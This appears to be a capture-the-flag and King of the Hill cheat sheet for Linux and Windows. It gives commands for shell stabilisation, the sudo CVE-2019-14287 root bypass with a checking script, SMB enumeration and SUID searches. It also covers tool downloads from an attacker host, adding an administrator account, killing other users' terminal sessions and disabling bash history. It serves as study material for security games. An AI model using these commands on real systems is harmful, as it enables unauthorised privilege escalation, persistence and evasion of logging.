2020-09-22 16:39:22 +00:00
# Linux
### Stabilize Shell
1. ctrl+z (backgrounds the reverse shell on the attacker side)
2. stty raw -echo; fg (press enter x2)
3. export TERM=xterm , for using `clear` and other terminal-aware programs
4. stty rows <n> cols <m> , optional, to match the size of your real terminal (`stty -a` in another window shows it)
### Spawn bash
* /usr/bin/script -qc /bin/bash /dev/null `the last argument is the typescript file; /dev/null discards it`
* python -c 'import pty;pty.spawn("/bin/bash")'
* python3 -c 'import pty;pty.spawn("/bin/bash")'
### Vulnerable sudo version
`sudo -u#-1 whoami`

Works on sudo < 1.8.28 (CVE-2019-14287) when `sudo -l` shows an entry of the form `(ALL, !root) <command>`: uid -1 (or 4294967295) is not rejected and is passed on as uid 0, so the command runs as root despite the `!root` restriction. Check `sudo --version` and `sudo -l` before trying it.
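The two pre-checks above, scripted so they can be run on a box before firing the command. This is an added example, not part of the original notes; the function names are mine, and `sudo -n -l` is used so that a shell without a tty never hangs on a password prompt (the check only sees NOPASSWD entries in that case).

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: decide whether the
# `sudo -u#-1` trick applies before running it. Two conditions must hold:
# sudo is older than 1.8.28, and `sudo -l` grants the current user some
# command as "(ALL, !root)", i.e. any user except root.

# Print the version number from the first line of `sudo --version`
# (e.g. "Sudo version 1.8.27" -> "1.8.27").
sudo_version_from_banner() {
    printf '%s\n' "$1" | sed -n 's/^Sudo version \([0-9][0-9.p]*\).*/\1/p' | head -n 1
}

# Return 0 if VERSION is older than 1.8.28 (the fixed release), 1 otherwise.
# `sort -V` orders version strings numerically, including suffixes like 1.8.21p2.
sudo_version_is_vulnerable() {
    local ver="$1" fixed="1.8.28"
    [ -n "$ver" ] || return 2
    [ "$ver" != "$fixed" ] || return 1
    [ "$(printf '%s\n%s\n' "$ver" "$fixed" | sort -V | head -n 1)" = "$ver" ]
}

# Given the text of `sudo -l`, print the commands runnable as "(ALL, !root)",
# one per line, with tags such as "NOPASSWD:" stripped. Returns 1 if none.
sudoers_all_but_root_commands() {
    local hits
    hits=$(printf '%s\n' "$1" \
        | sed -n 's/^[[:space:]]*(ALL, *!root)[[:space:]]*//p' \
        | sed 's/^\([A-Z]*:[[:space:]]*\)*//')
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}

# Live check on the current host: prints the command to try when both
# conditions hold. It does not run the exploit itself.
check_sudo_uid_bypass() {
    local banner ver cmds
    banner=$(sudo --version 2>/dev/null | head -n 1) || return 2
    ver=$(sudo_version_from_banner "$banner")
    sudo_version_is_vulnerable "$ver" || { echo "sudo $ver is not affected"; return 1; }
    # -n: never prompt for a password (a reverse shell has no tty to type into)
    cmds=$(sudoers_all_but_root_commands "$(sudo -n -l 2>/dev/null)") \
        || { echo "sudo $ver is affected, but no (ALL, !root) entry for $(id -un)"; return 1; }
    printf '%s\n' "$cmds" | while IFS= read -r c; do
        printf 'sudo %s is affected; try: sudo -u#-1 %s\n' "$ver" "$c"
    done
}
```

Run `check_sudo_uid_bypass` on the target; the parsing functions take captured text, so they can also be pointed at `sudo -l` output pasted from a box you no longer have a shell on.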
### Looking for SMB shares
#### SmbClient
* `smbclient -L \\\\<ip>\\ -N` listing all shares without a password (`-N` skips the prompt)
* `smbclient \\\\<ip>\\<share> -N` accessing a share anonymously
* `smbclient \\\\<ip>\\<share> -U <username>` accessing a share with an authorized user (prompts for the password)
#### Smbmap
* `smbmap -u <username> -p <password> -H <ip>`
#### Smbget
* `smbget -R smb://<ip>/<share>`
### Finding SUID/SGID Binaries
* `find / -perm -4000 -type f 2>/dev/null` set-user-ID (SUID) files: they run with the owner's uid
* `find / -perm -2000 -type f 2>/dev/null` set-group-ID (SGID) files: they run with the owning group's gid
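The raw `find` output is long on any real box, so the useful step is comparing it against a clean install of the same distribution. The following is an added example, not from the original notes: the function names and the baseline file format (one absolute path per line) are my own.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: list set-uid / set-gid
# files under a directory tree and report the ones that are not in a
# known-good baseline (one absolute path per line, taken from a clean box).

# Print, sorted, every regular file under ROOT with the given permission bit
# (4000 = set-uid, 2000 = set-gid). -xdev stays on one filesystem so /proc
# and network mounts are skipped; errors for unreadable dirs are dropped.
find_setid_files() {
    local root="$1" bit="$2"
    find "$root" -xdev -type f -perm "/$bit" -print 2>/dev/null | LC_ALL=C sort
}

# Print the set-uid files under ROOT that are not listed in BASELINE_FILE.
# Returns 0 if there are unexpected ones, 1 if the tree matches the baseline.
# grep -v -x -F -f: drop lines that exactly equal any baseline line.
unexpected_setuid_files() {
    local root="$1" baseline="$2" extra
    extra=$(find_setid_files "$root" 4000 | grep -v -x -F -f "$baseline")
    [ -n "$extra" ] || return 1
    printf '%s\n' "$extra"
}

# Live wrapper for a host: full listings plus the diff against a baseline
# (defaults to an empty baseline, which reports everything as unexpected).
audit_host() {
    local baseline="${1:-/dev/null}"
    echo "[*] set-uid files:";  find_setid_files / 4000
    echo "[*] set-gid files:";  find_setid_files / 2000
    echo "[*] set-uid files not in baseline $baseline:"
    unexpected_setuid_files / "$baseline" || echo "(none)"
}
```

`audit_host baseline.txt` on the target; a `find_setid_files / 4000 > baseline.txt` on a clean image of the same distribution produces the baseline.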
### Changing file attributes
* chattr +i filename `making file immutable (needs root / CAP_LINUX_IMMUTABLE; even root cannot modify or delete it until the flag is cleared)`
* chattr -i filename `making file mutable again`
* lsattr filename `checking file attributes`
### Uploading Files
* scp /file/you/want user@<ip>:/path/to/store
* python -m SimpleHTTPServer [port] `serves the current directory over HTTP; by default will listen on 8000 (Python 2)`
* python3 -m http.server [port] `same for Python 3; by default will listen on 8000`
### Downloading Files
* wget http://<ip>:<port>/<file>
* curl -O http://<ip>:<port>/<file> `when wget is missing`
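A transfer over a flaky reverse shell or through a proxy can silently truncate a binary, which then just "doesn't work". The added example below (not part of the original notes; function names are mine) wraps the upload and download commands from this and the previous section with a SHA-256 comparison on both ends.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: move a tool to a target
# with the HTTP server / wget commands from the notes and confirm it arrived
# intact by comparing SHA-256 on both ends.

# Print the SHA-256 of a file (sha256sum on Linux, shasum on macOS/BSD).
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Return 0 if FILE's SHA-256 equals EXPECTED (case-insensitive), 1 otherwise.
verify_sha256() {
    local file="$1" expected="$2" actual
    actual=$(file_sha256 "$file") || return 1
    [ "$(printf '%s' "$actual" | tr 'A-F' 'a-f')" = "$(printf '%s' "$expected" | tr 'A-F' 'a-f')" ]
}

# Attacker side: print the hash to copy over, then serve the current
# directory (python3 http.server as in the notes; port defaults to 8000).
serve_with_hash() {
    local file="$1" port="${2:-8000}"
    echo "sha256 $(file_sha256 "$file")  $file"
    python3 -m http.server "$port"
}

# Target side: fetch FILE from http://HOST:PORT/FILE with whatever is
# available (wget or curl), then check it against the hash printed above.
# A mismatch deletes the partial file so a broken tool is never run.
fetch_and_verify() {
    local host="$1" port="$2" file="$3" expected="$4"
    if command -v wget >/dev/null 2>&1; then
        wget -q -O "$file" "http://$host:$port/$file"
    elif command -v curl >/dev/null 2>&1; then
        curl -s -o "$file" "http://$host:$port/$file"
    else
        echo "no wget or curl on target" >&2; return 2
    fi
    if verify_sha256 "$file" "$expected"; then
        echo "$file: hash OK"
    else
        echo "$file: HASH MISMATCH, transfer corrupted or truncated" >&2
        rm -f "$file"; return 1
    fi
}
```

Attacker: `serve_with_hash linpeas.sh 8000`; target: `fetch_and_verify <ip> 8000 linpeas.sh <hash printed by the server>`.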
# Windows
### Adding User
net user "USER_NAME" "PASS" /add
### Changing User's password
net user "USER_NAME" "NEWPASS"
### Adding User to Administrators
net localgroup administrators "USER_NAME" /add
### Changing File Permissions
cacls <file> /e /p <USERNAME>:<PERMISSION> `/e edits the existing ACL instead of replacing it; /p sets that user's permission. cacls is deprecated; icacls is the current equivalent`

Permissions:
1. R `Read`
2. W `Write`
3. C `Change`
4. F `Full Control`
### Set File bits
* attrib +r filename `add read-only bit`
* attrib -r filename `remove read-only bit`
* attrib +h filename `add hidden bit`
* attrib -h filename `remove hidden bit`
### Show hidden file/folder
* dir /a `show everything, including hidden and system files & folders`
* dir /a:d `show directories only`
* dir /a:h `show hidden files & folders only (dir /a:hd for hidden directories only)`
### Downloading Files
certutil.exe -urlcache -split -f http://<ip>:<port>/<file> output.exe
# Msfvenom
### List All Payloads
msfvenom -l payloads
### List Payload Format
msfvenom --list formats
# Meterpreter
### Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
# King Of The Hill (KoTH)
### Monitoring and Closing Shell (Linux)
* strace `trace / tamper with a running process's syscalls (strace -p <pid>)`
* gdb `c/c++ debugger`
* script `records terminal activity`
* w / who `list logged-in users and their terminal devices (pts)`
* ps -t pts/<n> `list the processes attached to that terminal`
* script /dev/pts/<n> `writes the typescript of your own session onto that terminal, i.e. mirrors your output to them, not the other way round`
* cat /dev/urandom > /dev/pts/<n> 2>/dev/null `spams arbitrary text onto that terminal`
* pkill -9 -t pts/<n> `kills every process attached to that terminal, closing the session`
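The list above is typed by hand one terminal at a time. The added example below (not part of the original notes; function names are mine) reads `who` output to find the sessions that are not yours, shows what each one is running with `ps -t`, and wraps the message and kill commands. The parsers take captured text so the logic can be checked offline; only the helpers at the bottom touch the live system.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: find the other interactive
# sessions on a KoTH box from `who` output and build the watch / message /
# kill commands from the notes around them.

# From `who` output, print "user tty" for every pts session except OWN_TTY
# (e.g. "pts/0"). Lines look like: "root     pts/1   2020-09-23 16:51 (10.0.0.5)".
other_sessions() {
    local own="$1"
    printf '%s\n' "$2" | awk -v own="$own" '$2 ~ /^pts\// && $2 != own {print $1, $2}'
}

# Print just the tty names (pts/N) of the sessions belonging to USER.
sessions_of_user() {
    local user="$1"
    printf '%s\n' "$2" | awk -v u="$user" '$1 == u && $2 ~ /^pts\// {print $2}'
}

# Live: show what each foreign session is running (ps -t accepts pts/N).
watch_sessions() {
    local own who_out
    own=$(tty | sed 's#^/dev/##')   # "/dev/pts/0" -> "pts/0"
    who_out=$(who)
    other_sessions "$own" "$who_out" | while read -r user tty_name; do
        echo "== $user on $tty_name"
        ps -t "$tty_name" -o pid,user,stat,cmd
    done
}

# Live: send a line to one terminal, or kill everything attached to it.
# Writing to /dev/pts/N needs write permission on the device (root has it).
msg_session()  { printf '%s\n' "$2" > "/dev/$1"; }   # msg_session pts/3 "hi"
kill_session() { pkill -9 -t "$1"; }                  # kill_session pts/3

# Live: kick every session of one user, e.g. kick_user bob
kick_user() {
    sessions_of_user "$1" "$(who)" | while read -r tty_name; do kill_session "$tty_name"; done
}
```

`watch_sessions` in a loop (`watch -n 5` or a `while sleep 5` loop) gives a running view of who else is on the box; `kick_user <name>` then closes all of that player's terminals at once.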
### Send messages to logged in users
* echo "msg" > /dev/pts/<n> `send message to one specific terminal (needs write permission on the device, which root has)`
* wall msg `broadcast message to everyone`
### Closing Session (Windows)
* quser
* logoff id|user_name
### Disable bash history
`export HISTFILE=/dev/null`: found this; it might help you out a little when doing KoTH. It basically stops bash logging your commands in the `~/.bash_history` file.